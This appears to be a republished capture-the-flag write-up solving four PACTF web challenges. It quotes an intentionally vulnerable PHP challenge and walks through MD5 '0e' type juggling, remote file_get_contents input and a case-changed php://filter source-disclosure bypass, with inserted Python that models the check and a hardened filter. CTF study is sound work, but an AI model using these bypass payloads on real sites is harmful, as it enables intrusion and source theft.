PACTF.No2 WriteUp-1


Author: 夏夜星语 | Source: published 2018-05-20 20:10, read 26 times

    PACTF No.2: I only meant to tag along, but unexpectedly solved one Web challenge and went on to study another. This is the WriteUp, recording my own First Blood.

    1. First Blood of Web:

    Challenge:

    http://114.115.170.172:10400/


    [image: mobile]

    Seeing this, the question is how to use the so-called "Pixel 2 XL phone". A contest challenge will certainly not require you to go and find a real phone of that model, but Chrome's DevTools has a mobile device emulation mode, so straight to it:
    Open F12, switch to device emulation and choose "Pixel 2 XL":

    [image: Pixel 2 XL F12]

    Following the hint, change the request method to LGET and add the HTTP request header Referer: pixel

    [image: flag]

    The Response then contains the flag: W0nD3rFul_fuTnr4
    Complete it and submit: PACTF{W0nD3rFul_fuTnr4}. Haha, that is how my First Blood came about~~~~~

    2. Second Blood Of Web:

    http://114.115.170.172:10010/
    At first I tried http://114.115.170.172:10010/index.php?/a=http://www.baidu.com (thinking it was SSRF),
    but after a long time it got me nowhere.
    In the evening I threw it at a scanner:

    index.php~

    The source makes it clearer:

    <!--index.php~-->

    <?php
    error_reporting(0);
    session_start();

    if ($_SESSION['level1'] !== 'go') {
        if(!$_GET['a'])
        {
            header('Location: index.php?a=1a');
            die();
        }
        $a=$_GET['a'];

        if (stristr($a, 'input')) {
            die('no no no no ');
        }

        if (stristr($a, 'http')) {
            echo "<br />正确的的道路!平安!碰碰碰!<br />";;
        }

        $a2 = @file_get_contents($a,'r');

        if($a2=="12345")
        {
            echo "离flag又近了一步!";
            $_SESSION['level1'] = 'go';
            header('Location: index.php');
        }
        else
        {
            print "<p class='layui-elem-quote'>
            Tips: 12345,no CRLF。
            </p>";
        }
    }else{

        if(!($_POST['b']) and !($_POST['c']))
        {
            echo "<p class='layui-elem-quote'><a href='index.php?h=1&r=1' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>
            要通过这一关需要POST参数b和c!
            </p>";
            die();
        }

        $b = $_POST['b'];
        $c = $_POST['c'];

        if (!(is_numeric($b))) {
            echo "<br /> b 出错!<br />";
            die();
        }

        if (!(ctype_upper($c)) || (strlen($c) >= 5)) {
            echo "<br /> c 出错!<br />";
            die();
        }

        echo "<p class='layui-elem-quote'><a href='index.php?h=1&r=1' target='_blank' class='layui-btn layui-btn-big'>flag</a></p>";

        $hack = $_GET[h];
        $rep = $_GET[r];

        if ((strlen($hack) >= 6) || (strlen($rep) >= 6)) {
            echo "<br /> h OR r 出错!<br />";
            die();
        }

        $str1 = hash('md5', $b, false);
        $str2 = strtr(hash('md5', $c, false), $hack, $rep);

        echo "<p class='layui-elem-quote'>str1 : $str1</p>";
        echo "<p class='layui-elem-quote'>str2 : $str2</p>";

        if (($str1 == $str2) && !($b === $c) && (strlen($c) === 4)) {
            include('flag.php');
            echo "<p class='layui-elem-quote'>
            $flag
            </p>";
        }

    }

    ?>
    
    

    The index.php code is in the HTML comment.

    So let's work through this logic:

    1. First, the session value level1 has to become 'go', which requires parameter a to satisfy:
        $a2 = @file_get_contents($a,'r');
        if($a2=="12345")
    

    Since I found that parameter a can be an HTTP URL, I thought of an endpoint on my own VPS: a Flask file-upload page. I simply changed its HTML content to 12345, API: http://xx.xx.xx.xx:3421/file/upload; opening it in the browser returned 12345, OK.
    Then first visit: http://114.115.170.172:10010/index.php?a=http://xx.xx.xx.xx:3421/file/upload
    which leads to the next step:


    Combined with the code logic, the hard part now is finding B, C, h and r such that:
    B is purely numeric, C is four uppercase letters, and h and r are each shorter than 6 characters;
    and the md5 of B equals the md5 of C after its characters in h are replaced, in order, by those in r.
    There is a final result: (details to be added when I'm back at work; this part was worked out by a colleague)

    [image: flag]
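    As an added example (not the post's or the challenge author's code), the Python below models the gate quoted above: PHP's `==` compares two numeric-looking strings as numbers, so any two md5 hex digests of the form 0e followed by digits compare equal. It uses a known numeric string whose md5 has that shape for B and searches for a four-letter C whose digest strtr can force into the same shape; the helper names, the simplified `==` model and the search strategy are my own assumptions.

```python
import hashlib
import itertools
import re
import string

# Constructed for this example (not from the post): a well-known numeric string
# whose md5 hex is "0e" followed by digits only, so PHP's == reads it as 0.
MAGIC_B = "240610708"

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def php_strtr(s: str, frm: str, to: str) -> str:
    """Model of PHP strtr($s, $from, $to): one-to-one char mapping, extras ignored."""
    n = min(len(frm), len(to))
    return s.translate(str.maketrans(frm[:n], to[:n]))

def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP == on two strings: numeric strings compare as numbers, so
    "0e462..." == "0e000..." holds; anything else is an exact string compare."""
    numeric = re.compile(r"[0-9]+(?:e[0-9]+)?")
    if numeric.fullmatch(a) and numeric.fullmatch(b):
        return float(a) == float(b)
    return a == b

def passes_check(b: str, c: str, h: str, r: str) -> bool:
    """The gate from index.php~: b numeric, c four uppercase letters, h and r
    shorter than 6, md5(b) == strtr(md5(c), h, r) and b !== c."""
    if not (b.isdigit() and c.isalpha() and c.isupper() and len(c) == 4):
        return False
    if len(h) >= 6 or len(r) >= 6:
        return False
    str1 = md5_hex(b)
    str2 = php_strtr(md5_hex(c), h, r)
    return php_loose_eq(str1, str2) and b != c

def find_solution(b: str = MAGIC_B):
    """Search A-Z^4 for a c whose md5 becomes "0e<digits>" once the hex letters
    a,b,c,d,f are mapped to "0"; the single 'e' must sit at position 1."""
    for letters in itertools.product(string.ascii_uppercase, repeat=4):
        c = "".join(letters)
        digest = md5_hex(c)
        if digest[1] != "e" or digest.count("e") != 1 or digest[0] not in "0abcdf":
            continue
        h = "".join(sorted(set(digest) & set("abcdf")))  # letters to neutralise
        r = "0" * len(h)
        if passes_check(b, c, h, r):
            return b, c, h, r
    return None
```

    The same weakness is avoided server-side by comparing digests with `===` or `hash_equals()`, which never coerce strings to numbers.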

    3. Third Blood of Web: (I thought about this one for a long time, and so did my colleague; neither of us thought of PHP://filter)

    Change the file parameter:
    Then read this PHP file with PHP://filter, as follows (note that php://filter is filtered, but the check is case-sensitive, so it is bypassed with Php://filter):
    [image: PHP://filter]
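    To show why the case-sensitive check above fails and what a defender's version looks like, here is an added Python model (not the challenge's code). `weak_filter_blocks` mirrors the substring check the bypass implies; `hardened_blocks` is my own suggested replacement, with an assumed allow-list of includable files and constructed sample inputs.

```python
import re
from urllib.parse import unquote

# Assumed allow-list of files this app is ever meant to include (not from the post).
ALLOWED_FILES = {"index.php", "about.php"}

# Constructed sample values for the file parameter: a normal name, the literal
# wrapper, the case-variant bypass from the post, and a percent-encoded variant.
SAMPLES = [
    "index.php",
    "php://filter/convert.base64-encode/resource=index.php",
    "Php://filter/convert.base64-encode/resource=index.php",
    "PHP%3a%2f%2ffilter/read=convert.base64-encode/resource=index.php",
    "../flag.php",
]

def weak_filter_blocks(value: str) -> bool:
    """Case-sensitive substring check: misses 'Php://filter' and encoded forms."""
    return "php://filter" in value

def hardened_blocks(value: str) -> bool:
    """Decode, lower-case, reject any scheme/wrapper prefix, then allow-list."""
    decoded = unquote(unquote(value)).lower()
    if re.search(r"[a-z][a-z0-9+.-]*:", decoded):  # php:, data:, http:, ...
        return True
    return decoded not in ALLOWED_FILES

def audit(samples=SAMPLES) -> dict:
    """Return {value: (blocked_by_weak, blocked_by_hardened)} for each sample."""
    return {v: (weak_filter_blocks(v), hardened_blocks(v)) for v in samples}
```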

    At this point I knew it was promising:
    Base64-decode the returned content
    to get:


    [image: decode]

    Construct the parameters according to the code logic shown on the left.

    4. Fourth Blood of Web:

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>贪吃蛇</title>
    <style type="text/css">
    * {margin:0; padding:0}
    body {background:#333; -moz-user-select:none; text-align:center; font-size:12px}
    table {margin:80px auto 10px auto; overflow:hidden; border-collapse:collapse; }
    td {width:20px; height:20px; border:1px solid #eee; background:#f4f4f4}
    .cover {background:#39c;}
    .food {background:#093}
    .block {background:#333}
    .brake {background:#f00}
    .skate {background:#00f}
    #say {margin-top:50px; color:white}
    #help {width:420px; margin:0 auto; line-height:17px; color:white}
    #help span {float:left; margin-right:10px}
    #help .box {width:15px; height:15px; margin-right:5px; border:1px solid white}
    #btnStart {clear:both; width:100px; height:30px; margin-top:10px; padding:0; background:#bbb; color:#222; border:1px solid #fff; border-bottom-color:#000; border-right-color:#000; cursor:pointer}
    </style>
    <script type="text/javascript">
    // common
    function $(str) {
        return document.getElementById(str);
    }
    function $tag(str,target) {
        target = target || document;
        return target.getElementsByTagName(str);
    }
    // global
    // const
    var WIDTH = 20, //grid width
        HEIGHT = 20, //grid height
        SAY = ["pa_ctf","可以啊,继续加油!","知道吗?你离FLAG越来越近了!","厉害了看来你是一个游戏高手!","FLAG就在前方看你的了!","You Win?"];
    var len = 3, //snake length
        speed, //crawl speed
        gridElems = multiArray(WIDTH,HEIGHT), //cell elements
        carrier, //carrier layer (food, block, skate, brake)
        snake, //coordinates of each snake segment
        info, //message area
        btnStart, //start button
        topScore = len,
        snakeTimer, //snake movement timer
        brakeTimers = [], //random brakes
        skateTimers = [], //random skates
        directkey,
        anss = 'ZzJsVX'; // direction key codes 37-40: left, up, right, down
    window.onload = function(){
        info = $("say");
        btnStart = $("btnStart");
        initGrid(); //initialise the grid
        document.onkeydown = attachEvents; //bind direction keys
        btnStart.onclick = function (e) {
            btnStart.blur(); //in Firefox the focus must be released
            start(); //start the game
            btnStart.setAttribute("disabled",true);
            btnStart.style.color = "#aaa";
        }
    }
    //start the game
    function start() {
        len = 3;
        speed = 10;
        directkey = 39;
        carrier = multiArray(WIDTH,HEIGHT);
        snake = new Array();
        clear();
        initSnake(); //initialise the snake
        addObject("food");
        walk();
        addRandomBrake();
    }
    //create the grid
    function initGrid() {
        var body = $tag("body")[0];
        var table = document.createElement("table"),
            tbody = document.createElement("tbody")
        for(var j = 0; j < HEIGHT; j++) {
            var col = document.createElement("tr");
            for(var i = 0; i < WIDTH; i++) {
                var row = document.createElement("td");
                gridElems[i][j] = col.appendChild(row);
            }
            tbody.appendChild(col);
        }
        table.appendChild(tbody);
        $("snakeWrap").appendChild(table);
    }
    anss += 'R0NG9u';
    //create the snake
    function initSnake() {
        var pointer = randomPointer(len-1, len-1, WIDTH/2);
        for(var i = 0; i < len; i++) {
            var x = pointer[0] - i,
                y = pointer[1];
            snake.push([x,y]);
            carrier[x][y] = "cover";
        }
    }
    anss += 'b1VzX';
    //add the keyboard handler
    function attachEvents(e) {
        e = e || event;
        directkey = Math.abs(e.keyCode - directkey) != 2 && e.keyCode > 36 && e.keyCode < 41 ? e.keyCode : directkey; //non-direction keys and reversing are ignored
        return false;
    }
    function walk() {
        if(snakeTimer) window.clearInterval(snakeTimer);
        snakeTimer = window.setInterval(step, Math.floor(3000/speed));
    }
    anss += '1NuN2E4ZQo=';
    function step() {
        //get the target cell
        var headX = snake[0][0],
            headY = snake[0][1];
        switch(directkey) {
            case 37: headX -= 1; break;
            case 38: headY -= 1; break;
            case 39: headX += 1; break
            case 40: headY += 1; break;
        }
        //hitting a border or a block ends the game
        if(headX >= WIDTH || headX < 0 || headY >= HEIGHT || headY < 0 || carrier[headX][headY] == "block" || carrier[headX][headY] == "cover" ) {
            trace("GAME OVER");
            if(getText($("score"))*1 < len) trace(len,$("score"));
            btnStart.removeAttribute("disabled");
            btnStart.style.color = "#000";
            window.clearInterval(snakeTimer);
            for(var i = 0; i < brakeTimers.length; i++) window.clearTimeout(brakeTimers[i]);
            for(var i = 0; i < skateTimers.length; i++) window.clearTimeout(skateTimers[i]);
            return;
        }
    
        //speed up
        if(len % 4 == 0 && speed < 60 && carrier[headX][headY] == "food") {
            speed += 5;
            walk();
            trace("加速!");
        }
        //picked up a brake
        if(carrier[headX][headY] == "brake") {
            speed = 5;
            walk();
            trace("恭喜!捡到刹车一个。");
        }
        //ran into a skate
        if(carrier[headX][headY] == "skate") {
            speed += 20;
            walk();
            trace("遭遇滑板!");
        }
        //add a block
        if(len % 6 == 0 && len < 60 && carrier[headX][headY] == "food") {
            addObject("block");
        }
        //messages
        if(len <= 60 && len % 10 == 0) {
            var cheer = SAY[len/10-1];
            trace(cheer);
        }
        if(len == 70) {
            trace(anss);
        }
    
        if(len <= 100 && len > 60) {
            var cheer = SAY[5];
            trace(cheer);
        }
        //eating
        if(carrier[headX][headY] != "food") {
            var lastX = snake[snake.length-1][0],
                lastY = snake[snake.length-1][1];
            carrier[lastX][lastY] = false;
            gridElems[lastX][lastY].className = "";
            snake.pop();
        } else {
            carrier[headX][headY] = false;
            trace("吃到食物");
            addObject("food");
        }
        snake.unshift([headX,headY]);
        carrier[headX][headY] = "cover";
        gridElems[headX][headY].className = "cover";
    
        len = snake.length;
    }
    //add an item
    function addObject(name) {
        var p = randomPointer();
        carrier[p[0]][p[1]] = name;
        gridElems[p[0]][p[1]].className = name;
    }
    //add a random number of brakes and skates
    function addRandomBrake() {
        var num = randowNum(1,5);
        for(var i = 0; i < num; i++) {
            brakeTimers.push( window.setTimeout(function(){addObject("brake")},randowNum(10000,100000)) );
            skateTimers.push( window.setTimeout(function(){addObject("skate")},randowNum(5000,100000)) );
        }
    }
    //print a message
    function trace(sth,who) {
        who = who || info;
        if(document.all) who.innerText = sth;
        else who.textContent = sth;
    }
    //get the text
    function getText(target) {
        if(document.all) return target.innerText;
        else return target.textContent;
    }
    //create a 2-D array
    function multiArray(m,n) {
        var arr =  new Array(n);
        for(var i=0; i<m; i++)
            arr[i] = new Array(m);
        return arr;
    }
    //clear the board
    function clear() {
        for(var y = 0; y < gridElems.length; y++) {
            for(var x = 0; x < gridElems[y].length; x++) {
                gridElems[x][y].className = "";
            }
        }
    }
    //random point within a given range
    function randomPointer(startX,startY,endX,endY) {
        startX = startX || 0;
        startY = startY || 0;
        endX = endX || WIDTH;
        endY = endY || HEIGHT;
        var p = [],
            x = Math.floor(Math.random()*(endX - startX)) + startX,
            y = Math.floor(Math.random()*(endY - startY)) + startY;
        if(carrier[x][y]) return randomPointer(startX,startY,endX,endY);
        p[0] = x;
        p[1] = y;
        return p;
    }
    //random integer
    function randowNum(start,end) {
        return Math.floor(Math.random()*(end - start)) + start;
    }
    </script>
    </head>
    <body onselectstart="return false">
        <div id="say">贪吃蛇</div>
        <div id="snakeWrap"></div>
        <div id="help">
            <span class="box food"></span><span>绿色食物</span>
            <span class="box block"></span><span>灰色毒品</span>
            <span class="box skate"></span><span>蓝色滑板</span>
            <span class="box brake"></span><span>红色刹车</span>
            <span style="float:right">最高分:<strong id="score">0</strong></span>
            <input type="button" id="btnStart" value="开始游戏" />
        </div>
    </body>
    </html>
    

    The page above is a JS snake game. I had also noticed that the anss string looked out of place, but didn't think of simply printing it in the console; by the time my boss solved it I had moved on to another challenge. In fact, just console.log(anss) gives:
    ZzJsVXR0NG9ub1VzX1NuN2E4ZQo= Looking at it now, it is obviously base64; decode it to get the flag.


          Article link: https://www.haomeiwen.com/subject/zuitjftx.html